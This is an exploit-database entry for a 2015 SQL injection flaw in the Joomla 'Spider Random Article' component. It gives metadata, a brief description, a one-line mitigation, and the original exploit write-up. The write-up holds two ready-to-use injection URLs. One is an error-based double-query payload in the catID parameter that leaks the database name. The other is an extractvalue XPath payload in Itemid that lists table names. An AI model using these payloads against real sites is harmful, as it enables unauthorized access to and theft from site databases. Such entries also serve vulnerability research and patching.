Joomla Spider Random Article Component SQL Injection vulnerability

vendor:

Spider Random Article

by:

Jagriti Sahu AKA Incredible

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Spider Random Article

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Joomla Spider Random Article Component SQL Injection vulnerability

joomla component 'Spider Random Article' is not filtering data in catID and Itemid parameters and hence affected by SQL injection vulnerability. The vulnerability is due to catID and Itemid parameter. Error based double query injection can be used with catID parameter and xpath injection can be used with Itemid parameter.

Mitigation:

Input validation should be done for catID and Itemid parameters.

Source

Exploit-DB raw data:

##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability 

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter 


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 


SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

###################################################################################################


				   --==[[Special Thanks to]]==--

			          #  Manish Kishan Tanwar  ^_^ #